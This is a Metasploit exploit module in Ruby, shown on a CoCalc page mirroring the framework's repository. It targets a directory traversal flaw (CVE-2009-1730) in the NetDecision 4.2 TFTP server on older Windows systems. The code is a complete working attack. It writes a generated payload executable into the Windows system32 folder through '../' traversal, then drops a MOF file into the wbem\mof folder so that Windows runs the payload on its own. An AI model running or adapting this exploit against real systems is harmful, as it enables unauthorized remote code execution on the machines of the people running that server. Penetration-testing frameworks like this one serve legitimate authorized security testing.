CoCalc -- netdecision_tftp

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb
¹⁹⁶³⁷ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
class MetasploitModule < Msf::Exploit::Remote
6
  Rank = ExcellentRanking
7

8
  include Rex::Proto::TFTP
9
  include Msf::Exploit::EXE
10
  include Msf::Exploit::WbemExec
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => "NetDecision 4.2 TFTP Writable Directory Traversal Execution",
17
        'Description' => %q{
18
          This module exploits a vulnerability found in NetDecision 4.2 TFTP server. The
19
          software contains a directory traversal vulnerability that allows a remote attacker
20
          to write arbitrary file to the file system, which results in code  execution under
21
          the context of user executing the TFTP Server.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [
25
          'Rob Kraus', # Vulnerability discovery
26
          'juan vazquez' # Metasploit module
27
        ],
28
        'References' => [
29
          ['CVE', '2009-1730'],
30
          ['OSVDB', '54607'],
31
          ['BID', '35002']
32
        ],
33
        'Payload' => {
34
          'BadChars' => "\x00",
35
        },
36
        'DefaultOptions' => {
37
          'EXITFUNC' => 'thread'
38
        },
39
        'Platform' => 'win',
40
        'Targets' => [
41
          ['NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2', {}]
42
        ],
43
        'Privileged' => false,
44
        'DisclosureDate' => '2009-05-16',
45
        'DefaultTarget' => 0,
46
        'Notes' => {
47
          'Reliability' => UNKNOWN_RELIABILITY,
48
          'Stability' => UNKNOWN_STABILITY,
49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
50
        }
51
      )
52
    )
53

54
    register_options([
55
      OptInt.new('DEPTH', [false, "Levels to reach base directory", 1]),
56
      OptAddress.new('RHOST', [true, "The remote TFTP server address"]),
57
      OptPort.new('RPORT', [true, "The remote TFTP server port", 69])
58
    ])
59
  end
60

61
  def upload(filename, data)
62
    tftp_client = Rex::Proto::TFTP::Client.new(
63
      "LocalHost" => "0.0.0.0",
64
      "LocalPort" => 1025 + rand(0xffff - 1025),
65
      "PeerHost" => datastore['RHOST'],
66
      "PeerPort" => datastore['RPORT'],
67
      "LocalFile" => "DATA:#{data}",
68
      "RemoteFile" => filename,
69
      "Mode" => "octet",
70
      "Context" => { 'Msf' => self.framework, "MsfExploit" => self },
71
      "Action" => :upload
72
    )
73

74
    ret = tftp_client.send_write_request { |msg| print_status(msg) }
75
    while not tftp_client.complete
76
      select(nil, nil, nil, 1)
77
      tftp_client.stop
78
    end
79
  end
80

81
  def exploit
82
    peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
83

84
    # Setup the necessary files to do the wbemexec trick
85
    exe_name = rand_text_alpha(rand(10) + 5) + '.exe'
86
    exe = generate_payload_exe
87
    mof_name = rand_text_alpha(rand(10) + 5) + '.mof'
88
    mof = generate_mof(mof_name, exe_name)
89

90
    # Configure how deep we want to traverse
91
    depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
92
    levels = "../" * depth
93

94
    # Upload the malicious executable to C:\Windows\System32\
95
    print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
96
    upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
97

98
    # Let the TFTP server idle a bit before sending another file
99
    select(nil, nil, nil, 1)
100

101
    # Upload the mof file
102
    print_status("#{peer} - Uploading .mof...")
103
    upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
104
  end
105
end
106

107
Product

Resources

Company
